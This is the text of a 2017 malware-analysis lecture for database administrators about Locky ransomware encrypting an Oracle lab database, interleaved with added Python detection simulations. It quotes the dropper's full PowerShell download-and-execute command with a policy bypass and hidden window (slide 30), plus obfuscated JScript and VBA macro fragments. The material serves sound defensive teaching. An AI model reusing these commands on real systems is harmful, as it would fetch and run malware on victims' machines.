MALWARES ON WINDOWS AND LINUX: THE WORST THREAT FOR DATABASES
GUOB TECH DAY 2017 – LA OTN TOUR
(INTRODUCTORY LECTURE FOR DBAs)
By Alexandre Borges
ALEXANDRE BORGES – IT IS NOT ALLOWED TO COPY NEITHER REPRODUCE THIS SLIDE.
PROFILE AND TOC
TOC:
• Introduction
• Infection
• Test Environment
• Memory Analysis
• Quick Dynamic and Static Analysis
• Last words
Profile:
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-instructor at Symantec.
• Member of the CHFI Advisory Board at EC-Council.
• Reviewer member of The Journal of Digital Forensics, Security and Law.
• Referee for Digital Investigation: The International Journal of Digital Forensics & Incident Response.
• Author of the book “Oracle Solaris Advanced Administration”.
WARNING !!!
• Please pay attention to the following considerations:
• It is NOT ALLOWED to take pictures of the slides.
• It is NOT ALLOWED to record the lecture.
• It is NOT ALLOWED to film the lecture.
• Please respect the speaker and his material.
HTTP://ALEXANDREBORGES.ORG 3
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 4
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 5
• FACT: Malware is destroying the digital world.
• Several types of malware, by privilege level:
• Ring 3 (ransomware included)
• Ring 0 (kernel malware and bootkits)
• Ring -1 (VMM)
• Ring -2 (SMM)
• Ring -3 ? (Intel Management Engine)
• The number of malware samples infecting BIOS / UEFI has been increasing.
• Malware running on the GPU
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 6
• Malware has used several tricks to make detection harder than usual:
• Process hiding (DKOM)
• Process Replacement (Hollowing)
• DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)
• Services hiding + Service Hijacking
• Hidden Sockets
• Code Injection (multiple methods)
• Hooking (code, IAT, EAT)
• Binary hidden in the Registry
INTRODUCTION
[Diagram: three process entries (101, 102, 103) chained through their flink and blink pointers into a doubly linked list.]
DKOM (Direct Kernel Object Manipulation) on the processes list.
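The manipulation in the diagram and the cross-view check that catches it, as an added simulation that is not code from the deck: a constructed memory image holds tagged process records linked through flink/blink; rewriting the neighbours' pointers hides one record from a list walk (what pslist or Task Manager do) but not from a scan for the record's tag (what psscan does). The record layout, the "Proc" tag and the process names are assumptions made for this illustration only.

```python
import struct

# Constructed layout: each fake process object is a 16-byte record holding a
# pool tag, the PID and the flink/blink pair of its list entry. These are
# illustration-only offsets, not real EPROCESS offsets.
TAG = b"Proc"
REC = struct.Struct("<4sIII")          # tag, pid, flink, blink
REC_SIZE = REC.size                    # 16 bytes
HEAD = 0x1000                          # address of the list head (no tag, no pid)
NAMES = {101: "explorer.exe", 102: "hidden.exe", 103: "sqlplus.exe"}   # constructed


def build_image(pids):
    """Lay out the list head plus one record per pid, linked into a ring."""
    addrs = [HEAD] + [HEAD + REC_SIZE * (i + 1) for i in range(len(pids))]
    image = bytearray(HEAD + REC_SIZE * (len(pids) + 1))
    for i, addr in enumerate(addrs):
        flink = addrs[(i + 1) % len(addrs)]
        blink = addrs[(i - 1) % len(addrs)]
        tag, pid = (b"\0\0\0\0", 0) if addr == HEAD else (TAG, pids[i - 1])
        image[addr:addr + REC_SIZE] = REC.pack(tag, pid, flink, blink)
    return image


def read(image, addr):
    return REC.unpack_from(image, addr)


def unlink(image, addr):
    """DKOM as the slide describes it: rewrite the two neighbours so a walk
    skips this record. The record itself is untouched and keeps running."""
    _, _, flink, blink = read(image, addr)
    ftag, fpid, fflink, _ = read(image, flink)
    image[flink:flink + REC_SIZE] = REC.pack(ftag, fpid, fflink, blink)
    btag, bpid, _, bblink = read(image, blink)
    image[blink:blink + REC_SIZE] = REC.pack(btag, bpid, flink, bblink)


def walk_list(image):
    """What a list-walking tool sees: follow flink from the head until it wraps."""
    pids, addr = [], read(image, HEAD)[2]
    while addr != HEAD:
        _, pid, addr, _ = read(image, addr)
        pids.append(pid)
    return pids


def scan_pool(image):
    """What a carving tool sees: every record carrying the tag, linked or not."""
    return [read(image, off)[1]
            for off in range(0, len(image) - REC_SIZE + 1, 4)
            if image[off:off + 4] == TAG]


def cross_view(image):
    """Processes present in memory but absent from the linked list."""
    return sorted(set(scan_pool(image)) - set(walk_list(image)))


def demo():
    image = build_image([101, 102, 103])
    unlink(image, HEAD + REC_SIZE * 2)       # hide pid 102
    return walk_list(image), scan_pool(image), cross_view(image)


if __name__ == "__main__":
    listed, scanned, hidden = demo()
    print("list walk :", listed)
    print("pool scan :", scanned)
    print("hidden    :", [(p, NAMES[p]) for p in hidden])
```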
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 8
Basic Function Hooking
Caller (unchanged; it still calls good_function):
.....
push param3
push param2
push param1
call good_function
mov ebx, eax
....
good_function (its body now contains a call to the hook):
push ebp
mov ebp, esp
...good things...
call bad_function
....
ret
bad_function (the hook):
push ebp
mov ebp, esp
...bad things...
ret
INTRODUCTION
• NtClose function (from ntdll.dll) being hooked:
0x7c90cfd0 b819000000 MOV EAX, 0x19
0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050
0x7c90cfda ffd2 CALL EDX
0x7c90cfdc c20400 RET 0x4
0x7c90cfdf 90 NOP
0x7c90cfe0 b81a000000 MOV EAX, 0x1a
0x7c90cfe5 ba DB 0xba
0x7c90cfe6 0003 ADD [EBX], AL
HTTP://ALEXANDREBORGES.ORG 9
Hooking
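A check a memory-forensics tool can apply to the stub above, as an added example that is not code from the deck: decode the two MOVs and the CALL of an ntdll syscall stub and compare what EDX holds with the system-call dispatcher address. The clean layout assumed here is the 32-bit XP-era one (MOV EAX, no / MOV EDX, 0x7ffe0300 / CALL [EDX] / RET 4, with 0x7ffe0300 being SharedUserData!SystemCallStub); the module map is an assumption. Note that the slide's target 0x7c900050 is only 0x50 bytes past ntdll's base, i.e. inside its PE header, so a module-range check alone would not flag it.

```python
import struct

# Constructed stubs. The hooked one reproduces the bytes shown on the slide:
# EDX now holds 0x7c900050 and the indirect CALL [EDX] became a direct CALL EDX.
CLEAN_NTCLOSE = bytes.fromhex("b819000000" "ba0003fe7f" "ff12" "c20400")
HOOKED_NTCLOSE = bytes.fromhex("b819000000" "ba5000907c" "ffd2" "c20400")

SYSTEM_CALL_STUB = 0x7FFE0300          # assumed dispatcher address (XP-era)
MODULES = {"ntdll.dll": (0x7C900000, 0x7C9AF000)}   # assumed module map


def parse_stub(stub):
    """Return (syscall_no, edx_value, call_form) for a MOV EAX / MOV EDX / CALL stub."""
    if stub[0] != 0xB8 or stub[5] != 0xBA:
        raise ValueError("unexpected stub layout")
    syscall_no = struct.unpack_from("<I", stub, 1)[0]
    edx = struct.unpack_from("<I", stub, 6)[0]
    call = stub[10:12]
    if call == b"\xff\x12":
        return syscall_no, edx, "call [edx]"
    if call == b"\xff\xd2":
        return syscall_no, edx, "call edx"
    raise ValueError("unexpected call form")


def locate(addr):
    """Name the module containing addr and say whether addr is in its header page."""
    for name, (lo, hi) in MODULES.items():
        if lo <= addr < hi:
            return name, addr - lo < 0x1000
    return None, False


def check_stub(name, stub):
    """Flag a stub whose dispatch no longer goes through the system-call stub."""
    syscall_no, edx, form = parse_stub(stub)
    reasons = []
    if form != "call [edx]":
        reasons.append("direct CALL EDX instead of CALL [EDX]")
    if edx != SYSTEM_CALL_STUB:
        module, in_header = locate(edx)
        reasons.append("EDX points to %#x in %s%s" % (
            edx, module or "unmapped memory",
            " (PE header page, which should hold no code)" if in_header else ""))
    return {"function": name, "syscall": syscall_no,
            "hooked": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, stub in (("clean", CLEAN_NTCLOSE), ("hooked", HOOKED_NTCLOSE)):
        print(label, check_stub("NtClose", stub))
```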
INTRODUCTION
0x7c900050 b203 MOV DL, 0x3
0x7c900052 eb08 JMP 0x7c90005c
0x7c900054 b204 MOV DL, 0x4
0x7c900056 eb04 JMP 0x7c90005c
0x7c900058 b205 MOV DL, 0x5
0x7c90005a eb00 JMP 0x7c90005c
0x7c90005c 52 PUSH EDX
0x7c90005d e804000000 CALL 0x7c900066
0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL
0x7c90006a 6e OUTS DX, BYTE [ESI]
.....
HTTP://ALEXANDREBORGES.ORG 10
Hooking
Anti-disassembly trick.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 11
• What about injection techniques? There are many methods:
• Remote DLL Injection: it is easily detected because the DLL must be on disk before being injected.
• PE Injection: a PE file, which has its IAT configured for the target process, is written into the address space of the target process and forced to execute there.
• Reflective Injection: similar to the previous one, but the code (usually a DLL) manages its own initialization.
• APC Injection: malicious code is executed by attaching it to an APC (Asynchronous Procedure Call) of the target thread.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 12
• Other tricks:
• Hooking SSDT
• Hooking IDT
• Orphan Threads
• IRP Hooking
• Hiding kernel drivers
• Bypassing KCS (Kernel Code Signing)
• Callbacks
• Filtering Drivers
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 13
• The analysis can be difficult because there are several anti-analysis techniques:
• Anti-Debugging
• Anti-Disassembly
• Anti-VMware
• Packers (common and virtualized ones)
• Obfuscation
• .NET tricks
• Powershell + WMI
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 14
• There are many threats infecting firmware; they are persistent and stealthy.
• They can replace the OS boot loader, patch the kernel, and so on...
• Petya (MBR ransomware)
• Mebromi (BIOS rootkit)
• Gapz (BIOS parameter block modification)
• TDL4
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 15
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 16
• http://privacy-pc.com/articles/ransomware-chronicle.html
INTRODUCTION - KASPERSKY OVERALL STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 17
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_2016_Statistics_ENG.pdf
INTRODUCTION - KASPERSKY OVERALL STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 18
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_2016_Statistics_ENG.pdf
INTRODUCTION - SYMANTEC INTERNET SECURITY THREAT REPORT 2016
HTTP://ALEXANDREBORGES.ORG 19
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
Huh? Are you sure that Linux systems are safe against malware?
INFECTION
HTTP://ALEXANDREBORGES.ORG 20
INFECTION
HTTP://ALEXANDREBORGES.ORG 21
• Malware has three main goals when it infects a system:
• Owning the system, to use it in future attacks
• Stealing data
• Hijacking data (ransomware)
• We know the main infection techniques:
• USB
• Network sharing
• Exploiting vulnerabilities (remember WannaCry)
INFECTION
HTTP://ALEXANDREBORGES.ORG 22
Click to die
INFECTION
HTTP://ALEXANDREBORGES.ORG 23
Obfuscated code. However, it is trivial to solve it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 24
Obfuscated code. Again, it is trivial to solve it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 25
function nomusta(prototu){return prototu.replace(/AA/g,"");}
var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
• nomusta() only strips every "AA", so the ProgID becomes "MSXML2.XMLHTTP" and fuka is an XMLHttpRequest object.
• XMLHttpRequest object: represents an XML request using HTTP.
• It has an open method that requests a synchronous or asynchronous file download from a specific URL.
INFECTION
HTTP://ALEXANDREBORGES.ORG 26
• The XMLHttpRequest object also has a send method, which sends an HTTP request to the server and receives a response.
function zulum(pikue) {pikue.send();}
zulum(fuka);
function hust(gulibator){eval(gulibator);}
hust(gusar);
• hust() is just a wrapper around eval(): whatever text is passed in (here, gusar) is executed as script.
INFECTION
HTTP://ALEXANDREBORGES.ORG 27
Click to die
INFECTION
HTTP://ALEXANDREBORGES.ORG 28
Probably, the malware’s author wants to execute something bad on your system.
INFECTION
HTTP://ALEXANDREBORGES.ORG 29
Sub Document_Open( )
urgixbe = "gwefakqyrb"
If (odbumuwgi = 811) Then
If (osduzu = "icdyclaw") Then
….
hnevo = Shell(ibovuhl, unymk)
niwwyshomq = Empty
tnovgistoqme = "58732" & 18
sgukkezihh = "46106" & 81
...
Again, obfuscated code. Once more, it is very simple to bypass it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 30
"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/search.php','%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'""
The command line the macro ends up running: PowerShell, with execution-policy bypass, no profile and a hidden window, downloads a file from the remote host into %AppData% and starts it; the random letter casing is the only obfuscation left.
I have not shown the deobfuscation process because it is really simple.
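A triage rule for command lines like the one above, as an added example that is not code from the deck: it folds away the case mangling, scores the indicators the slide's command carries (execution-policy bypass, hidden window, WebClient download into %AppData%, Start-Process) and adds weight when the PowerShell chain is spawned under an Office parent. The events are constructed, Sysmon-style process-creation records; the download host from the slide is replaced by a placeholder.

```python
import re

# Constructed process-creation records (not real telemetry). The third one
# mirrors the command line dissected on the slide, host replaced by a placeholder.
EVENTS = [
    {"pid": 4180, "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\backup.ps1'},
    {"pid": 4210, "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"ping -n 1 dbhost.example.invalid"},
    {"pid": 4377, "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmd": r'''CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://dropper.example.invalid/search.php','%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'"'''},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# (name, regex applied to the normalised command line, weight)
INDICATORS = [
    ("powershell", r"powershell(\.exe)?\b", 0),
    ("execution policy bypass", r"-e[a-z]*\s+bypass", 2),
    ("hidden window", r"-w[a-z]*\s+hidden", 2),
    ("no profile", r"-nop(rofile)?\b", 1),
    ("WebClient download", r"system\.net\.webclient.*\.download(file|string)\(", 3),
    ("payload in %appdata%", r"%appdata%[^'\"]*\.exe", 2),
    ("start-process", r"\bstart-process\b", 1),
]


def normalize(cmd):
    """Case mangling and stray whitespace are the cheapest obfuscation; fold them away."""
    return re.sub(r"\s+", " ", cmd).lower()


def score_event(event):
    """Return the matched indicator names and a weighted score for one record."""
    cmd = normalize(event["cmd"])
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, cmd)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    if "powershell" in hits and event["parent"].lower().endswith(OFFICE_PARENTS):
        hits.append("spawned by Office")
        score += 3
    return {"pid": event["pid"], "score": score, "hits": hits}


def triage(events, threshold=5):
    """Records whose score reaches the threshold, in input order."""
    return [r for r in (score_event(e) for e in events) if r["score"] >= threshold]


if __name__ == "__main__":
    for result in triage(EVENTS):
        print(result)
```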
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 31
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 32
[Diagram: two Windows 8 x64 virtual machines, one with Oracle Database 12.2 installed and one with Oracle Instant Client 12.2 installed, connected through NAT to the Internet.]
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 33
• LISTENER.ORA
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 34
• TNSNAMES.ORA
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 35
C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))
Enter password: Malware123!
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
SQL> select instance_name from v$instance;
INSTANCE_NAME
------------------------------------------------
orcl
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 36
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 37
Infected with Locky (version JUL/30/2017)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 38
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 39
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 40
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 41
Encrypted database files. On Windows you are lucky, because the OS prevents two processes from altering the same file at the same time. On Linux... no luck.
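The Linux half of that remark, as an added demonstration that is not from the deck: flock() locks are advisory, so a process that never asks for the lock can still truncate and overwrite a file that another process holds open and exclusively locked. The Windows share-mode behaviour the slide relies on cannot be reproduced here, so only the Linux side is shown; the datafile is a constructed temporary file.

```python
import fcntl
import os
import tempfile


def overwrite_while_locked(path):
    """Hold the file open with an exclusive flock(), as a cooperating process
    would, then let a second, independent descriptor truncate and overwrite it
    without ever asking for the lock. Returns (write_succeeded, bytes on disk)."""
    holder = os.open(path, os.O_RDWR)
    fcntl.flock(holder, fcntl.LOCK_EX)            # advisory: binds only flock() callers
    try:
        intruder = os.open(path, os.O_WRONLY | os.O_TRUNC)   # no flock() call at all
        try:
            os.write(intruder, b"overwritten by a process that ignored the lock")
            succeeded = True
        except OSError:
            succeeded = False
        finally:
            os.close(intruder)
        with open(path, "rb") as f:
            return succeeded, f.read()
    finally:
        fcntl.flock(holder, fcntl.LOCK_UN)
        os.close(holder)


def demo():
    """Create a stand-in datafile, run the experiment, clean up."""
    fd, path = tempfile.mkstemp(suffix=".dbf")
    os.write(fd, b"stand-in datafile header and blocks ...")
    os.close(fd)
    try:
        return overwrite_while_locked(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    ok, content = demo()
    print("intruder write succeeded:", ok)
    print("file now holds:", content)
```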
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 42
Photo from Twitter of my colleague Valerie Thomas (@hacktress09)
After the Oracle database has been encrypted by the ransomware....
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 43
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 44
Probably, the ransomware is destroying snapshots
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 45
Running as administrator
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 46
DLLs that are responsible for accessing the network/Internet ;)
32-bit code running on x64. Of course.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 47
Class Identifier (CLSID) registry entries. Is COM present?
Interesting Registry entries.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 48
A few URLs in memory.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 49
Locky ransomware connecting to C2 (Command and Control Server).
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 50
Russia...again?
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 51
VAD Short (VadS) and RWE protection: code injection, of course.
(VAD == Virtual Address Descriptor)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 52
Three injected code regions saved to disk. Pay attention: three different hashes.
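The rule behind the two slides above and the dump-and-hash step, as an added example that is not code from the deck: over a constructed VAD table in the shape vadinfo/malfind report (tag, range, protection, backing file, content), flag the short, file-less VADs with PAGE_EXECUTE_READWRITE protection, classify what their first bytes look like, and hash each region so that three distinct blobs yield three distinct hashes. The region contents, the dump naming scheme and the addresses are assumptions for this illustration.

```python
import hashlib
import random


def region_bytes(seed, size, prefix=b""):
    """Deterministic filler standing in for a dumped region (constructed, not real)."""
    rng = random.Random(seed)
    body = bytes(rng.getrandbits(8) for _ in range(size - len(prefix)))
    return prefix + body


PAGE_EXECUTE_READWRITE = "PAGE_EXECUTE_READWRITE"
PROLOGUE = b"\x55\x8b\xec"            # push ebp; mov ebp, esp

# Constructed VAD table. Three private RWE regions play the role of the three
# injected blobs on the slide; the first two entries are ordinary memory.
VADS = [
    {"tag": "Vad ", "start": 0x00400000, "end": 0x0047FFFF, "protect": "PAGE_EXECUTE_WRITECOPY",
     "file": r"\Windows\System32\svchost.exe", "data": region_bytes(1, 512, b"MZ\x90\x00")},
    {"tag": "VadS", "start": 0x00250000, "end": 0x0025FFFF, "protect": "PAGE_READWRITE",
     "file": None, "data": bytes(512)},
    {"tag": "VadS", "start": 0x02A10000, "end": 0x02A2FFFF, "protect": PAGE_EXECUTE_READWRITE,
     "file": None, "data": region_bytes(2, 512, b"MZ\x90\x00")},
    {"tag": "VadS", "start": 0x02B50000, "end": 0x02B5FFFF, "protect": PAGE_EXECUTE_READWRITE,
     "file": None, "data": region_bytes(3, 512, PROLOGUE)},
    {"tag": "VadS", "start": 0x02C00000, "end": 0x02C0FFFF, "protect": PAGE_EXECUTE_READWRITE,
     "file": None, "data": region_bytes(4, 512, PROLOGUE)},
]


def is_suspicious(vad):
    """malfind's core rule: a short (private, file-less) VAD that is writable and executable."""
    return (vad["tag"] == "VadS" and vad["file"] is None
            and vad["protect"] == PAGE_EXECUTE_READWRITE)


def classify(data):
    """Rough label from the first bytes of the region."""
    if data[:2] == b"MZ":
        return "PE image (injected DLL/EXE)"
    if data.startswith(PROLOGUE):
        return "raw code (x86 function prologue)"
    return "unknown"


def malfind(vads, pid):
    """Flag suspicious regions and 'dump' each: name, size, content type, SHA-256."""
    findings = []
    for v in vads:
        if not is_suspicious(v):
            continue
        findings.append({
            "dump": "pid%d_%08x.dmp" % (pid, v["start"]),   # naming scheme assumed here
            "size": len(v["data"]),
            "kind": classify(v["data"]),
            "sha256": hashlib.sha256(v["data"]).hexdigest(),
        })
    return findings


def distinct_hashes(findings):
    return len({f["sha256"] for f in findings})


if __name__ == "__main__":
    results = malfind(VADS, 1234)
    for r in results:
        print(r["dump"], r["size"], r["kind"], r["sha256"])
    print("distinct hashes:", distinct_hashes(results))
```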
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 53
Interesting string references and DLLs.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 54
It is a hook, but this specific one is not important right now.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 55
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 56
It seems that our malware is the Locky ransomware, isn’t it?
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 57
Take a look at the entropy.
Boring to reverse.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 58
High entropy.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 59
Encrypted overlay.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 60
MFC (Microsoft Foundation Classes) is a collection of C++ classes commonly used in object-oriented programming. Usually, MFC can be thought of as a wrapper around the Windows API (a “proxy” role).
No import names
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 61
IDA Pro shows us all function names inside MFC42.dll, but the reversing analysis is very boring.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 62
There is no Crypto function.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 63
Classic unpacking process, loading DLLs one by one.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 64
These new segments are coming from VirtualAlloc() calls. Eventually, one of them could be the unpacked executable that we are looking for.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 65
These are good signs. Therefore, we can save this dump to disk.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 66
The Crypto functions have arisen!
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 67
At this point your life changes (desperately looking for a backup).
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 68
from CryptImportKey( )
from CryptCreateHash( )
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 69
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 70
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 71
```c
/* Encryption loop recovered from the sample (the slide's pseudocode, commented here).
   AB_IV appears to be the author's placeholder for the CryptoAPI IV parameter (KP_IV). */
CryptSetKeyParam(hOriginalKey, AB_IV, new_IV);       /* set the IV once on the original key   */
while (block = NextBlockEncoding())                   /* walk the victim file block by block   */
{
    hDuplicateKey = CryptDuplicateKey(hOriginalKey);  /* copy key state, IV included           */
    CryptEncrypt(hDuplicateKey, block);               /* encrypt this block with the fresh copy */
    CryptDestroyKey(hDuplicateKey);                   /* drop the copy: every block starts from
                                                         the same IV, chaining never carries on */
}
```
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 72
The usual place to set up persistence.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 73
The sample looks up the file extensions whose files it will encrypt; this data reference points to the list of all of them.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 74
A few of the extensions targeted by the ransomware, among them .dbf (Oracle database files).
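A quick triage step for the dump saved to disk in the slides above, added here as an example and not the author's code: it pulls ASCII and UTF-16LE strings out of the dump and flags the CryptoAPI names and the file-extension list, .dbf included. The sample bytes are constructed for the demonstration; on a real case the analyst feeds in the dumped file.

```python
import re

# Constructed test data resembling an unpacked ransomware dump (not a real sample).
SAMPLE_DUMP = (
    b"\x00\x00MZ\x90\x00" + b"\x00" * 16
    + b"CryptAcquireContextA\x00CryptImportKey\x00CryptCreateHash\x00"
    + b"CryptSetKeyParam\x00CryptDuplicateKey\x00CryptEncrypt\x00CryptDestroyKey\x00"
    + b"\x00" * 8
    + ".dbf\x00.doc\x00.xlsx\x00.ora\x00".encode("utf-16-le")   # extension list, wide strings
    + b"\x00" * 8
)

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")            # printable ASCII runs, 4+ chars
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")    # printable UTF-16LE runs, 4+ chars
EXT_RE = re.compile(r"^\.[A-Za-z0-9]{1,5}$")          # looks like a file extension

# Real CryptoAPI names; the ones on the slides plus the usual setup calls.
CRYPTO_APIS = {
    "CryptAcquireContextA", "CryptAcquireContextW", "CryptGenKey", "CryptImportKey",
    "CryptCreateHash", "CryptSetKeyParam", "CryptDuplicateKey", "CryptEncrypt",
    "CryptDestroyKey",
}

def extract_strings(data: bytes):
    """Yield ASCII and UTF-16LE strings, the way the 'strings' tool does."""
    for m in ASCII_RE.finditer(data):
        yield m.group().decode("ascii")
    for m in UTF16_RE.finditer(data):
        yield m.group().decode("utf-16-le")

def triage_dump(data: bytes) -> dict:
    """Summarise a saved dump: CryptoAPI imports and the extension list it carries."""
    found = list(extract_strings(data))
    apis = sorted(s for s in found if s in CRYPTO_APIS)
    # Section names such as ".text" also match EXT_RE; a long cluster is the real signal.
    exts = sorted({s.lower() for s in found if EXT_RE.match(s)})
    return {
        "crypto_apis": apis,
        "extensions": exts,
        "targets_oracle_dbf": ".dbf" in exts,
        "verdict": "ransomware-like" if apis and exts else "inconclusive",
    }

if __name__ == "__main__":
    print(triage_dump(SAMPLE_DUMP))
```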
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 75
Connects to the author's server using a username and password.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 76
We could use Wireshark, couldn't we?
REMEMBER
HTTP://ALEXANDREBORGES.ORG 77
We are always in CONTROL...
HTTP://ALEXANDREBORGES.ORG 78
THANK YOU FOR ATTENDING MY LECTURE!
LinkedIn: http://www.linkedin.com/in/aleborges
Twitter: @ale_sp_brazil
Blog: http://alexandreborges.org
E-mail: [email protected]